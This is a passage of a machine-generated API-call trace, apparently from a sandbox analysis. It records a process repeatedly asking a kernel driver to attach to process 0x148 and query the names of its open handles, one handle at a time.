PsLookupProcessByProcessId (in: ProcessId=0x148, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0132.055] PsAcquireProcessExitSynchronization () returned 0x0 [0132.055] KeStackAttachProcess (in: PROCESS=0xfffffa8003533060, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8003533060, ApcState=0xfffff880051635d0) [0132.055] ObReferenceObjectByHandle (in: Handle=0x34c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a000fac530, HandleInformation=0x0) returned 0x0 [0132.055] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0132.056] PsReleaseProcessExitSynchronization () returned 0x2 [0132.056] ObfDereferenceObject (Object=0xfffffa8003533060) returned 0x79 [0132.056] ObQueryNameString (in: Object=0xfffff8a000fac530, ObjectNameInfo=0xfffffa8002876044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002876044, ReturnLength=0xfffff88005163550) returned 0x0 [0132.056] ObfDereferenceObject (Object=0xfffff8a000fac530) returned 0x1 [0132.056] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0132.056] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e905e0 | out: hHeap=0x290000) returned 1 [0132.056] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e905e0 [0132.056] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e905e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e905e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0132.056] PsLookupProcessByProcessId (in: ProcessId=0x148, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0132.056] PsAcquireProcessExitSynchronization () returned 0x0 [0132.056] KeStackAttachProcess (in: PROCESS=0xfffffa8003533060, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8003533060, ApcState=0xfffff880051635d0) [0132.056] ObReferenceObjectByHandle (in: Handle=0x350, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a00196efc0, HandleInformation=0x0) returned 0x0 [0132.056] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0132.056] PsReleaseProcessExitSynchronization () returned 0x2 [0132.056] ObfDereferenceObject (Object=0xfffffa8003533060) returned 0x79 [0132.056] ObQueryNameString (in: Object=0xfffff8a00196efc0, ObjectNameInfo=0xfffffa8002877044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002877044, ReturnLength=0xfffff88005163550) returned 0x0 [0132.056] ObfDereferenceObject (Object=0xfffff8a00196efc0) returned 0x1 [0132.056] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0132.056] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e905e0 | out: hHeap=0x290000) returned 1 [0132.056] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e905e0 [0132.056] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e905e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e905e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0132.056] PsLookupProcessByProcessId (in: ProcessId=0x148, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0132.056] PsAcquireProcessExitSynchronization () returned 0x0 [0132.056] KeStackAttachProcess (in: PROCESS=0xfffffa8003533060, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8003533060, ApcState=0xfffff880051635d0) [0132.057] ObReferenceObjectByHandle (in: Handle=0x390, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a0010366b0, HandleInformation=0x0) returned 0x0 [0132.057] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0132.057] PsReleaseProcessExitSynchronization () returned 0x2 [0132.057] ObfDereferenceObject (Object=0xfffffa8003533060) returned 0x79 [0132.057] ObQueryNameString (in: Object=0xfffff8a0010366b0, ObjectNameInfo=0xfffffa8002c25044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002c25044, ReturnLength=0xfffff88005163550) returned 0x0 [0132.057] ObfDereferenceObject (Object=0xfffff8a0010366b0) returned 0x1 [0132.057] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0132.057] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e905e0 | out: hHeap=0x290000) returned 1 [0132.057] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e905e0 [0132.057] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e905e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e905e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0132.057] PsLookupProcessByProcessId (in: ProcessId=0x148, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0132.057] PsAcquireProcessExitSynchronization () returned 0x0 [0132.057] KeStackAttachProcess (in: PROCESS=0xfffffa8003533060, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8003533060, ApcState=0xfffff880051635d0) [0132.057] ObReferenceObjectByHandle (in: Handle=0x3a4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a00103ebc0, HandleInformation=0x0) returned 0x0 [0132.057] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0132.057] PsReleaseProcessExitSynchronization () returned 0x2 [0132.057] ObfDereferenceObject (Object=0xfffffa8003533060) returned 0x79 [0132.057] ObQueryNameString (in: Object=0xfffff8a00103ebc0, ObjectNameInfo=0xfffffa8002f1f044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002f1f044, ReturnLength=0xfffff88005163550) returned 0x0 [0132.057] ObfDereferenceObject (Object=0xfffff8a00103ebc0) returned 0x1 [0132.057] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0132.058] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e905e0 | out: hHeap=0x290000) returned 1 [0132.058] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e905e0 [0132.058] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e905e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e905e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0132.058] PsLookupProcessByProcessId (in: ProcessId=0x148, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0132.058] PsAcquireProcessExitSynchronization () returned 0x0 [0132.058] KeStackAttachProcess (in: PROCESS=0xfffffa8003533060, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8003533060, ApcState=0xfffff880051635d0) [0132.058] ObReferenceObjectByHandle (in: Handle=0x3f8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a00000aa70, HandleInformation=0x0) returned 0x0 [0132.058] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0132.058] PsReleaseProcessExitSynchronization () returned 0x2 [0132.058] ObfDereferenceObject (Object=0xfffffa8003533060) returned 0x79 [0132.058] ObQueryNameString (in: Object=0xfffff8a00000aa70, ObjectNameInfo=0xfffffa8002f63044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002f63044, ReturnLength=0xfffff88005163550) returned 0x0 [0132.058] ObfDereferenceObject (Object=0xfffff8a00000aa70) returned 0x1 [0132.058] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0132.058] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e905e0 | out: hHeap=0x290000) returned 1 [0132.058] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e905e0 [0132.058] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e905e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e905e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0132.058] PsLookupProcessByProcessId (in: ProcessId=0x148, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0132.058] PsAcquireProcessExitSynchronization () returned 0x0 [0132.058] KeStackAttachProcess (in: PROCESS=0xfffffa8003533060, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8003533060, ApcState=0xfffff880051635d0) [0132.059] ObReferenceObjectByHandle (in: Handle=0x474, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a00138cf40, HandleInformation=0x0) returned 0x0 [0132.059] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0132.059] PsReleaseProcessExitSynchronization () returned 0x2 [0132.059] ObfDereferenceObject (Object=0xfffffa8003533060) returned 0x79 [0132.059] ObQueryNameString (in: Object=0xfffff8a00138cf40, ObjectNameInfo=0xfffffa8002f79344, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002f79344, ReturnLength=0xfffff88005163550) returned 0x0 [0132.059] ObfDereferenceObject (Object=0xfffff8a00138cf40) returned 0x1 [0132.059] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0132.059] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e905e0 | out: hHeap=0x290000) returned 1 [0132.059] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e905e0 [0132.059] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e905e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e905e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0132.059] PsLookupProcessByProcessId (in: ProcessId=0x148, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0132.059] PsAcquireProcessExitSynchronization () returned 0x0 [0132.059] KeStackAttachProcess (in: PROCESS=0xfffffa8003533060, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8003533060, ApcState=0xfffff880051635d0) [0132.059] ObReferenceObjectByHandle (in: Handle=0x48c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a00128d4f0, HandleInformation=0x0) returned 0x0 [0132.059] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0132.059] PsReleaseProcessExitSynchronization () returned 0x2 [0132.059] ObfDereferenceObject (Object=0xfffffa8003533060) returned 0x79 [0132.059] ObQueryNameString (in: Object=0xfffff8a00128d4f0, ObjectNameInfo=0xfffffa8002f5e044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002f5e044, ReturnLength=0xfffff88005163550) returned 0x0 [0132.059] ObfDereferenceObject (Object=0xfffff8a00128d4f0) returned 0x1 [0132.059] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0132.060] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e905e0 | out: hHeap=0x290000) returned 1 [0132.060] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e905e0 [0132.060] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e905e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e905e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0132.060] PsLookupProcessByProcessId (in: ProcessId=0x148, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0132.060] PsAcquireProcessExitSynchronization () returned 0x0 [0132.060] KeStackAttachProcess (in: PROCESS=0xfffffa8003533060, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8003533060, ApcState=0xfffff880051635d0) [0132.060] ObReferenceObjectByHandle (in: Handle=0x4cc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a00146d0f0, HandleInformation=0x0) returned 0x0 [0132.060] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0132.060] PsReleaseProcessExitSynchronization () returned 0x2 [0132.060] ObfDereferenceObject (Object=0xfffffa8003533060) returned 0x79 [0132.060] ObQueryNameString (in: Object=0xfffff8a00146d0f0, ObjectNameInfo=0xfffffa80028c56c4, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa80028c56c4, ReturnLength=0xfffff88005163550) returned 0x0 [0132.060] ObfDereferenceObject (Object=0xfffff8a00146d0f0) returned 0x1 [0132.060] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0132.060] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e905e0 | out: hHeap=0x290000) returned 1 [0132.060] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e905e0 [0132.060] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e905e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e905e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0132.060] PsLookupProcessByProcessId (in: ProcessId=0x148, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0132.060] PsAcquireProcessExitSynchronization () returned 0x0 [0132.061] KeStackAttachProcess (in: PROCESS=0xfffffa8003533060, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8003533060, ApcState=0xfffff880051635d0) [0132.061] ObReferenceObjectByHandle (in: Handle=0x4d0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a0017b23b0, HandleInformation=0x0) returned 0x0 [0132.061] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0132.061] PsReleaseProcessExitSynchronization () returned 0x2 [0132.061] ObfDereferenceObject (Object=0xfffffa8003533060) returned 0x79 [0132.061] ObQueryNameString (in: Object=0xfffff8a0017b23b0, ObjectNameInfo=0xfffffa80029637c4, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa80029637c4, ReturnLength=0xfffff88005163550) returned 0x0 [0132.061] ObfDereferenceObject (Object=0xfffff8a0017b23b0) returned 0x1 [0132.061] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0132.061] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e905e0 | out: hHeap=0x290000) returned 1 [0132.061] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e905e0 [0132.061] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e905e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e905e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0132.061] PsLookupProcessByProcessId (in: ProcessId=0x148, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0132.061] PsAcquireProcessExitSynchronization () returned 0x0 [0132.061] KeStackAttachProcess (in: PROCESS=0xfffffa8003533060, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8003533060, ApcState=0xfffff880051635d0) [0132.061] ObReferenceObjectByHandle (in: Handle=0x4dc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a001b4f800, HandleInformation=0x0) returned 0x0 [0132.061] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0132.062] PsReleaseProcessExitSynchronization () returned 0x2 [0132.062] ObfDereferenceObject (Object=0xfffffa8003533060) returned 0x79 [0132.062] ObQueryNameString (in: Object=0xfffff8a001b4f800, ObjectNameInfo=0xfffffa8002f06044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002f06044, ReturnLength=0xfffff88005163550) returned 0x0 [0132.062] ObfDereferenceObject (Object=0xfffff8a001b4f800) returned 0x1 [0132.062] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0132.062] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e905e0 | out: hHeap=0x290000) returned 1 [0132.062] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e905e0 [0132.062] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e905e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e905e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0132.062] PsLookupProcessByProcessId (in: ProcessId=0x148, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0132.062] PsAcquireProcessExitSynchronization () returned 0x0 [0132.062] KeStackAttachProcess (in: PROCESS=0xfffffa8003533060, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8003533060, ApcState=0xfffff880051635d0) [0132.062] ObReferenceObjectByHandle (in: Handle=0x4e8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a001b25640, HandleInformation=0x0) returned 0x0 [0132.062] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0132.063] PsReleaseProcessExitSynchronization () returned 0x2 [0132.063] ObfDereferenceObject (Object=0xfffffa8003533060) returned 0x79 [0132.063] ObQueryNameString (in: Object=0xfffff8a001b25640, ObjectNameInfo=0xfffffa8002f2d044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002f2d044, ReturnLength=0xfffff88005163550) returned 0x0 [0132.063] ObfDereferenceObject (Object=0xfffff8a001b25640) returned 0x1 [0132.063] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0132.063] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e905e0 | out: hHeap=0x290000) returned 1 [0132.063] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e905e0 [0132.063] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e905e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e905e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0132.063] PsLookupProcessByProcessId (in: ProcessId=0x148, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0132.063] PsAcquireProcessExitSynchronization () returned 0x0 [0132.063] KeStackAttachProcess (in: PROCESS=0xfffffa8003533060, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8003533060, ApcState=0xfffff880051635d0) [0132.063] ObReferenceObjectByHandle (in: Handle=0x4f8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a001b31af0, HandleInformation=0x0) returned 0x0 [0132.063] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0132.063] PsReleaseProcessExitSynchronization () returned 0x2 [0132.063] ObfDereferenceObject (Object=0xfffffa8003533060) returned 0x79 [0132.064] ObQueryNameString (in: Object=0xfffff8a001b31af0, ObjectNameInfo=0xfffffa8002f5d044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002f5d044, ReturnLength=0xfffff88005163550) returned 0x0 [0132.064] ObfDereferenceObject (Object=0xfffff8a001b31af0) returned 0x1 [0132.064] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0132.064] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e905e0 | out: hHeap=0x290000) returned 1 [0132.064] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e905e0 [0132.064] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e905e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e905e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0132.064] PsLookupProcessByProcessId (in: ProcessId=0x148, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0132.064] PsAcquireProcessExitSynchronization () returned 0x0 [0132.064] KeStackAttachProcess (in: PROCESS=0xfffffa8003533060, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8003533060, ApcState=0xfffff880051635d0) [0132.064] ObReferenceObjectByHandle (in: Handle=0x504, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a001b26f30, HandleInformation=0x0) returned 0x0 [0132.064] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0132.064] PsReleaseProcessExitSynchronization () returned 0x2 [0132.064] ObfDereferenceObject (Object=0xfffffa8003533060) returned 0x79 [0132.064] ObQueryNameString (in: Object=0xfffff8a001b26f30, ObjectNameInfo=0xfffffa800289c044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa800289c044, ReturnLength=0xfffff88005163550) returned 0x0 [0132.064] ObfDereferenceObject (Object=0xfffff8a001b26f30) returned 0x1 [0132.064] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0132.064] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e905e0 | out: hHeap=0x290000) returned 1 [0132.064] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e905e0 [0132.064] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e905e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e905e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0132.064] PsLookupProcessByProcessId (in: ProcessId=0x148, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0132.065] PsAcquireProcessExitSynchronization () returned 0x0 [0132.065] KeStackAttachProcess (in: PROCESS=0xfffffa8003533060, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8003533060, ApcState=0xfffff880051635d0) [0132.065] ObReferenceObjectByHandle (in: Handle=0x50c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a001bade00, HandleInformation=0x0) returned 0x0 [0132.065] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0132.065] PsReleaseProcessExitSynchronization () returned 0x2 [0132.065] ObfDereferenceObject (Object=0xfffffa8003533060) returned 0x79 [0132.065] ObQueryNameString (in: Object=0xfffff8a001bade00, ObjectNameInfo=0xfffffa8002f5b044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002f5b044, ReturnLength=0xfffff88005163550) returned 0x0 [0132.065] ObfDereferenceObject (Object=0xfffff8a001bade00) returned 0x1 [0132.065] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0132.065] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e905e0 | out: hHeap=0x290000) returned 1 [0132.065] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e905e0 [0132.065] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e905e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e905e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0132.065] PsLookupProcessByProcessId (in: ProcessId=0x148, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0132.065] PsAcquireProcessExitSynchronization () returned 0x0 [0132.065] KeStackAttachProcess (in: PROCESS=0xfffffa8003533060, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8003533060, ApcState=0xfffff880051635d0) [0132.065] ObReferenceObjectByHandle (in: Handle=0x510, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a001bde8a0, HandleInformation=0x0) returned 0x0 [0132.065] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0132.065] PsReleaseProcessExitSynchronization () returned 0x2 [0132.065] ObfDereferenceObject (Object=0xfffffa8003533060) returned 0x79 [0132.065] ObQueryNameString (in: Object=0xfffff8a001bde8a0, ObjectNameInfo=0xfffffa8002f57044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002f57044, ReturnLength=0xfffff88005163550) returned 0x0 [0132.066] ObfDereferenceObject (Object=0xfffff8a001bde8a0) returned 0x1 [0132.066] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0132.066] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e905e0 | out: hHeap=0x290000) returned 1 [0132.066] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e905e0 [0132.066] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e905e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e905e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0132.066] PsLookupProcessByProcessId (in: ProcessId=0x148, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0132.066] PsAcquireProcessExitSynchronization () returned 0x0 [0132.066] KeStackAttachProcess (in: PROCESS=0xfffffa8003533060, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8003533060, ApcState=0xfffff880051635d0) [0132.066] ObReferenceObjectByHandle (in: Handle=0x538, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a001745540, HandleInformation=0x0) returned 0x0 [0132.066] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0132.066] PsReleaseProcessExitSynchronization () returned 0x2 [0132.066] ObfDereferenceObject (Object=0xfffffa8003533060) returned 0x79 [0132.066] ObQueryNameString (in: Object=0xfffff8a001745540, ObjectNameInfo=0xfffffa8002f55044, Length=0x800, ReturnLength=0xfffff88005163550 | out: 